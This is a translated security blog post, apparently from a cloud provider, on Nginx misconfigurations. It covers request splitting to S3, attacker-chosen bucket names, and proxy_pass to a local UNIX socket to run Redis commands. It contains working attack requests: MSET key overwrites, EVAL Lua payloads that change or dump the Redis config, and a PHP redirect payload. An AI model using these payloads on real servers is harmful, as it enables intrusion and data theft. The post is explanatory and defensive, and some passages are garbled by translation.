Common Nginx misconfigurations that leave a web server vulnerable: part two

Earlier, Cloud4Y covered vulnerabilities in Nginx web servers, load balancers, and proxy servers. Some of it you may already have known; the rest, we hope, proved useful.

But the story does not end there. Numerous bug bounty programs make large-scale research possible, and that research turns up real-world vulnerabilities. The Gixy project has helped find many middleware misconfigurations, but not all of them. Here is what else we found:

Middleware is everywhere

Exploiting HTTP request splitting with cloud storage

HTTP splitting is nothing new and has been written about a lot; the vulnerability is part of the OWASP checklist. However, we are seeing a growing number of hosts that proxy static content from S3 cloud storage under /media/, /images/, /sitemap/ and similar paths. If the regular expressions in these configurations are too loose, they allow good old request splitting. Cloud storage services, which mostly rely on the Host header to decide which bucket to serve from, are ideal targets on the other side of the proxy.

Let’s say you have a web server and want to proxy external content under certain paths. One example could be media hosted on S3, or any application under yourdomain.com/docs/.

One configuration you might create (warning: don’t do this) could look like this:

location ~ /docs/([^/]*/[^/]*)? {
    proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
}

In this case, any URL under yourdomain.com/docs/ will be served from S3. With this regular expression, yourdomain.com/docs/help/contact-us retrieves the S3 object located at:

https://bucket.s3.amazonaws.com/docs-website/help/contact-us.html

The problem with this regex is that it also matches newlines by default. Here, the [^/]* part also matches encoded newlines, and when the regex group is passed to proxy_pass, it is URL-decoded. This means that the following request:

GET /docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a HTTP/1.1

Host: yourdomain.comWould actually make the following request from the web server to S3:

GET /docs-website/ HTTP/1.1

Host:non-existing-bucket1

.html HTTP/1.0



Host: bucket.s3.amazonaws.comWhere S3 to retrieve content from storage is called non-existing-bucket1… The answer in this case would be:

This vulnerability has been found in the wild several times. It results in content from a different bucket being served under the same domain.
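To see why the negated character class is the culprit, the matching step can be reproduced outside Nginx. The following is a minimal sketch, assuming Python's `re` behaves like Nginx's regex engine for this pattern (in both, `[^/]` also matches CR and LF). The function names and the stricter pattern are hypothetical illustrations, not a vetted fix.

```python
import re
from urllib.parse import unquote

# Location regex from the vulnerable example, and a stricter variant
# (the strict pattern is an illustrative assumption, not a vetted fix).
LOOSE_RE = re.compile(r"/docs/([^/]*/[^/]*)?")
STRICT_RE = re.compile(r"/docs/([^/\s]*/[^/\s]*)?")


def upstream_request_head(raw_path: str) -> str:
    """Approximate the start of the request sent upstream for raw_path."""
    decoded = unquote(raw_path)  # the regex sees the percent-decoded path
    match = LOOSE_RE.match(decoded)
    if match is None:
        raise ValueError("path is not handled by this location")
    group = match.group(1) or ""
    return f"GET /docs-website/{group}.html HTTP/1.0"


def strict_accepts(raw_path: str) -> bool:
    """True if the whole decoded path matches the stricter pattern."""
    return STRICT_RE.fullmatch(unquote(raw_path)) is not None


ATTACK_PATH = "/docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a"
head = upstream_request_head(ATTACK_PATH)
print(repr(head))
print(strict_accepts(ATTACK_PATH), strict_accepts("/docs/help/contact-us"))
```

Printing the `repr` makes the injected CRLF sequences visible. Excluding whitespace from the class (and anchoring the match) is one way to keep the capture from carrying a second header line.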

Gixy flags the case where a location regex also captures newlines. However, there are other cases where Gixy is unaware of the impact of letting a visitor control parts of the path. We have seen issues like this with similar Nginx configurations:



location ~ /images([0-9]+)/([^s]+) {

proxy_pass https://s3.amazonaws.com/companyname-images$1/$2;

}In this case, the company used several vaults that were used to /images 1/ and /images 2/… However, since the regex accepts any number, providing a much larger number in the URL will allow us to create a new repository and serve our content there. For example yourcompany.com/images999999/ like in the picture below:
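The effect of the open-ended `[0-9]+` group can be shown with a few lines of code. This is a sketch only: the function names are hypothetical, and the allowlist of suffixes `1` and `2` is an assumption based on the two buckets mentioned in the text.

```python
import re
from typing import Optional

IMAGES_RE = re.compile(r"/images([0-9]+)/([^\s]+)")

# Assumption: only these two bucket suffixes actually belong to the company.
ALLOWED_SUFFIXES = {"1", "2"}


def upstream_url(path: str) -> Optional[str]:
    """Mirror the vulnerable mapping: any number selects a bucket."""
    match = IMAGES_RE.match(path)
    if match is None:
        return None
    return f"https://s3.amazonaws.com/companyname-images{match.group(1)}/{match.group(2)}"


def upstream_url_allowlisted(path: str) -> Optional[str]:
    """Same mapping, but only for suffixes known to exist."""
    match = IMAGES_RE.match(path)
    if match is None or match.group(1) not in ALLOWED_SUFFIXES:
        return None
    return f"https://s3.amazonaws.com/companyname-images{match.group(1)}/{match.group(2)}"


print(upstream_url("/images999999/evil.html"))
print(upstream_url_allowlisted("/images999999/evil.html"))
print(upstream_url_allowlisted("/images2/logo.png"))
```

In an Nginx configuration the same idea would be expressed by enumerating the known suffixes in the regex rather than accepting arbitrary digits.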

Controlling the proxied host

In some configurations, the matched path is used as part of the hostname that requests are proxied to:



location ~ /static/(.*)/(.*) {
    proxy_pass http://$1-example.s3.amazonaws.com/$2;
}

In this case, any URL under yourdomain.com/static/js/ will be served from the corresponding js-example bucket on S3. With this regex, yourdomain.com/static/js/app-1555347823-min.js retrieves the S3 object located at:

http://js-example.s3.amazonaws.com/app-1555347823-min.js

Since the bucket name is controlled by the attacker (it is part of the URI path), this leads to XSS, but it also has further consequences.



The proxy_pass directive in Nginx supports proxying requests to local UNIX sockets. What may be surprising is that the URL given to proxy_pass can consist of http:// followed by a UNIX domain socket path, specified after the word unix and enclosed in colons, for example http://unix:/tmp/backend.socket:/uri/.

This means that we could force proxy_pass to connect to a local UNIX socket and control some of the data sent to it. The severity of the vulnerability depends on what is listening on the socket, but it is far from harmless.
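Configurations of this kind can be spotted mechanically. The sketch below is a rough check in the spirit of a linter rule, assuming the proxy_pass target has already been extracted from the configuration as a string; the function name is hypothetical and the pattern is deliberately crude.

```python
import re

# Matches a proxy_pass target in which a variable appears before the first
# "/" that follows the optional scheme, i.e. in the host part, or a target
# that starts with a variable.
VARIABLE_IN_HOST = re.compile(r"^(?:https?://)?[^/]*\$")


def host_is_request_controlled(target: str) -> bool:
    """True if the host part of a proxy_pass target contains a variable."""
    return VARIABLE_IN_HOST.match(target) is not None


for target in (
    "http://$1-example.s3.amazonaws.com/$2",
    "https://bucket.s3.amazonaws.com/docs-website/$1.html",
    "$orig_loc",
):
    print(target, host_is_request_controlled(target))
```

A check like this also flags legitimate uses where the variable comes from a trusted map, and it misses cases where the variable sits in the path and still selects a bucket, so it is a starting point for review rather than a verdict.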

Let’s see how this setup can be used to send arbitrary commands to, and receive output from, a Redis instance listening on a local UNIX socket. This assumes that the user running the Nginx server has permission to access the Redis socket.

Mitigation measures

SSRF/XSPA attacks against Redis are nothing new, and the Redis team has taken measures to prevent them. Either of the following conditions causes Redis to close the connection and stop parsing commands:

- The line starts with POST
- The line starts with Host:

The first condition mitigates the classic scenario in which an attacker uses the request body to send commands. The second mitigates any HTTP-based attack (at least those carrying data below the Host header). However, if we could somehow use the first line of the request to execute Redis commands, this protection could be bypassed.
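The two conditions can be modelled in a few lines to show which part of a proxied request survives them. This is a toy model, not Redis's actual parser: the function name and sample requests are hypothetical, and matching the prefixes case-insensitively is an assumption of the sketch.

```python
from typing import List

# Prefixes that, per the text above, make Redis close the connection.
# Matching case-insensitively is an assumption of this sketch.
ABORT_PREFIXES = ("post", "host:")


def lines_acted_on(raw: bytes) -> List[str]:
    """Return the lines a parser with these two rules would still process."""
    acted_on = []
    for line in raw.decode("latin-1").split("\r\n"):
        if line.lower().startswith(ABORT_PREFIXES):
            break  # connection closed, nothing after this line is parsed
        if line:
            acted_on.append(line)
    return acted_on


proxied = b"GET /some/path HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n"
posted = b"POST / HTTP/1.1\r\nHost: localhost\r\n\r\nSET k v\r\n"
print(lines_acted_on(proxied))
print(lines_acted_on(posted))
```

In this model only the request line of a proxied request is ever processed, which is why the rest of the attack concentrates on that single line.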



To test whether this is possible, we set up a local UNIX socket using socat and an Nginx server with the following misconfiguration:

$ socat UNIX-LISTEN:/tmp/mysocket STDOUT

location ~ /static/(.*)/(.*\.js) {
    proxy_pass http://$1-example.s3.amazonaws.com/$2;
}

For this request:

GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1
Host: example.com

the socket receives the following data:

GET TEST-example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

What happened here? Let's break it down:

- The full proxy_pass URL becomes http://unix:/tmp/mysocket:TEST-example.s3.amazonaws.com/app-1555347823-min.js
- The first piece of data sent to the socket is the HTTP request method: GET
- The second part is the data that we specified: TEST
- The third part is hardcoded: -example.s3.amazonaws.com/
- The fourth part is the filename, that is, the second group in the regex: app-1555347823-min.js
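The breakdown above can be traced step by step in code. The sketch below mimics the substitution and the split observed in the experiment; it is not Nginx's actual URL parser, and the helper names are hypothetical.

```python
import re
from typing import Tuple
from urllib.parse import unquote

STATIC_RE = re.compile(r"/static/(.*)/(.*\.js)")


def proxied_target(raw_path: str) -> str:
    """Substitute the regex groups into the proxy_pass template."""
    match = STATIC_RE.match(unquote(raw_path))
    if match is None:
        raise ValueError("path is not handled by this location")
    return f"http://{match.group(1)}-example.s3.amazonaws.com/{match.group(2)}"


def split_unix_target(target: str) -> Tuple[str, str]:
    """Split http://unix:<socket>:<rest> into (socket path, rest)."""
    prefix = "http://unix:"
    if not target.startswith(prefix):
        raise ValueError("not a UNIX socket target")
    socket_path, _, rest = target[len(prefix):].partition(":")
    return socket_path, rest


target = proxied_target("/static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js")
socket_path, rest = split_unix_target(target)
request_line = f"GET {rest} HTTP/1.0"
print(target)
print(socket_path)
print(request_line)
```

The greedy first group swallows everything up to the last slash before the filename, which is what lets the socket path and the injected text travel inside a single capture.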

Great! So can we simply use the first two parts (GET and TEST) to build the Redis command and comment out the rest?

Unfortunately, Redis has no comments. So while we can insert spaces to turn the third and fourth parts into command arguments, Redis is very strict about its input and about extra arguments.

How it looks

We will not be able to use the request body or other headers, as Nginx will always add the Host: header directly below the first line of the request, which, as already mentioned, will cause redis to drop the connection and stop the attack.

Overwriting a Redis key

Fortunately, there are redis commands that take a variable number of arguments. MSET (https://redis.io/commands/mset) accepts a variable number of keys and values:

MSET key1 "Hello" key2 "World"
GET key1
"Hello"
GET key2
"World"

In other words, we can use a request like this to write any key:

MSET /static/unix:%2ftmp%2fmysocket:hacked%20%22true%22%20/app-1555347823-min.js HTTP/1.1
Host: example.com

The result is the following data on the socket (for Redis):

MSET hacked "true" -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

Checking Redis for the hacked key:

127.0.0.1:6379> get hacked
"true"

Great! We have confirmed that we can write arbitrary keys. But what about issuing commands that don’t take a variable number of arguments?

Arbitrary Redis Command Execution

Redis EVAL Commands

It turns out that the Redis EVAL command also accepts a variable number of arguments:

- The first argument to EVAL is a Lua 5.1 script.
- The second argument to EVAL is the number of arguments that follow the script (starting from the third argument) and represent Redis key names.
- All remaining arguments do not have to represent key names and can be accessed from Lua through the global variable ARGV.
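The argument layout described above explains why trailing text after the script is tolerated: with a key count of 0, everything that follows simply lands in ARGV. A minimal sketch, assuming `shlex.split` is a close enough stand-in for how Redis tokenizes a quoted inline command; the function name and the sample lines are hypothetical.

```python
import shlex
from typing import List, Tuple


def split_eval_args(line: str) -> Tuple[str, List[str], List[str]]:
    """Split an inline EVAL line into (script, KEYS, ARGV)."""
    tokens = shlex.split(line)
    if len(tokens) < 3 or tokens[0].upper() != "EVAL":
        raise ValueError("expected: EVAL <script> <numkeys> [args...]")
    script, numkeys = tokens[1], int(tokens[2])
    rest = tokens[3:]
    if numkeys < 0 or numkeys > len(rest):
        raise ValueError("numkeys does not fit the argument list")
    return script, rest[:numkeys], rest[numkeys:]


script, keys, argv = split_eval_args('EVAL "return ARGV[1]" 0 trailing-junk HTTP/1.0')
print(script, keys, argv)
```

With a key count of 1 instead, the first trailing token would be treated as a key name and the remainder as ARGV.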

We can execute Redis commands from EVAL using two different Lua functions:

- redis.call()
- redis.pcall()



Let’s try using EVAL to overwrite the config key maxclients:

EVAL /static/unix:%2ftmp%2fmysocket:%22return%20redis.call('config','set','maxclients',1337)%22%200%20/app-1555347823-min.js HTTP/1.1
Host: example.com

Result:

EVAL "return redis.call('config','set','maxclients',1337)" 0 -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

How it looks

Checking the maxclients setting after the request:

127.0.0.1:6379> config get maxclients
1) "maxclients"
2) "1337"

Great! We can run arbitrary Redis commands. There is only one problem: none of these commands returns a valid HTTP response, so Nginx does not forward the command output to the client and instead returns a generic 502 Bad Gateway error.

So how do we retrieve the data?



Reading Redis Output

To our surprise, we can avoid the 502 error simply by placing the string HTTP/1.0 200 OK anywhere in the response; the complete Redis response is then forwarded to the client, even if that string is not on the first line of the response!

To ensure that the response from Redis always contains this string, we can use string concatenation in the Lua script.

An example of retrieving the response to the command CONFIG GET *:

EVAL /static/unix:%2ftmp%2fmysocket:'return%20(table.concat(redis.call("config","get","*"),"\n").."%20HTTP/1.1%20200%20OK\r\n\r\n")'%200%20/app-1555347823-min.js HTTP/1.1
Host: example.com

As a result:

EVAL 'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")' 0 -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

And the output is sent to the client:

After forwarding


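When reproducing this against your own test setup, the quoting and percent-encoding are easy to get wrong by hand. The sketch below assembles the request path from its parts; the helper names are hypothetical, and it encodes more characters than the hand-written request above (for example the quotes and the slash in the status string), which decodes to the same path.

```python
from urllib.parse import quote, unquote

# Lua string literal appended to the command result. It is a raw Python
# string, so the backslash escapes are left for Lua to interpret.
STATUS_LITERAL = r'" HTTP/1.1 200 OK\r\n\r\n"'


def lua_with_status(expr: str) -> str:
    """Wrap a Lua expression so its result ends with an HTTP status line."""
    return f"return ({expr}..{STATUS_LITERAL})"


def static_path(socket_path: str, lua_script: str, filename: str) -> str:
    """Build the /static/... path carrying the script and a key count of 0."""
    payload = f"'{lua_script}' 0 "
    return (
        "/static/unix:"
        + quote(socket_path, safe="")
        + ":"
        + quote(payload, safe="")
        + "/"
        + filename
    )


script = lua_with_status(r'table.concat(redis.call("config","get","*"),"\n")')
path = static_path("/tmp/mysocket", script, "app-1555347823-min.js")
print(script)
print(path)
```

Decoding the generated path with `unquote` gives back the socket path, the quoted script, the key count, and the filename in the order the location regex expects.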

Now we can go further. If you want proxy_pass to follow redirects rather than pass them back to the client, there is unfortunately no setting for that. However, many examples (hello, StackOverflow) suggest doing the following (warning: don’t do this):

location ~ /images(.*) {
    proxy_intercept_errors on;
    proxy_pass http://example.com$1;
    error_page 301 302 307 303 = @handle_redirects;
}

location @handle_redirects {
    set $original_uri $uri;
    set $orig_loc $upstream_http_location;
    proxy_pass $orig_loc;
}

With this configuration, if the origin host responds with a 301 status, Nginx takes the Location header and passes it to the second proxy_pass inside @handle_redirects. This means that if such a rewrite is in place and the origin has an open redirect, we control the entire proxy_pass target. However, this requires the origin host to redirect when the EVAL HTTP method is used. But as shown above, if we can point the request at our own malicious origin, we can make sure that it redirects the EVAL request back to the UNIX socket:

error_page 404 405 =301 @405;

location @405 {
    try_files /index.php?$args /index.php?$args;
}

<?php
header('Location: http://unix:/tmp/redis.sock:\'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")\' 1 ', true, 301);
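The underlying problem is that the Location value is trusted without any check. As an illustration of the kind of validation a redirect-following proxy needs, here is a minimal sketch of an allowlist check; the allowlist contents and the function name are hypothetical, and this is application-level logic rather than something Nginx provides as a setting.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the proxy may follow redirects to.
ALLOWED_REDIRECT_HOSTS = {"example.com"}


def is_safe_redirect(location: str) -> bool:
    """Accept only http(s) redirects to an explicitly allowed host."""
    try:
        parts = urlsplit(location)
    except ValueError:
        return False
    return (
        parts.scheme in ("http", "https")
        and parts.hostname in ALLOWED_REDIRECT_HOSTS
    )


print(is_safe_redirect("http://example.com/images/logo.png"))
print(is_safe_redirect("http://unix:/tmp/redis.sock:payload"))
print(is_safe_redirect("//evil.test/x"))
```

A Location value pointing at a UNIX socket parses with the host `unix`, which is not on the list, so it is rejected along with scheme-relative and off-domain targets.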

Accessing internal Nginx blocks

Using the X-Accel-Redirect response header, we can make Nginx redirect internally to another location block, even one marked with the internal directive:

location /internal_only/ {
    internal;
    root /var/www/html/internal/;
}

Accessing localhost-restricted Nginx blocks

Using a hostname whose DNS record points to 127.0.0.1, we can get Nginx to redirect internally to blocks that only allow localhost:

location /localhost_only/ {
    # allow/deny rules are checked in order until the first match
    allow 127.0.0.1;
    deny all;
    root /var/www/html/internal/;
}

Conclusion

Middleware plays a critical role in enabling your web server platform to provide the web services required by modern web applications. However, the ubiquity and usefulness of such software also means there are potential vulnerabilities to be aware of and fix, especially if you are running an open source platform like Nginx.
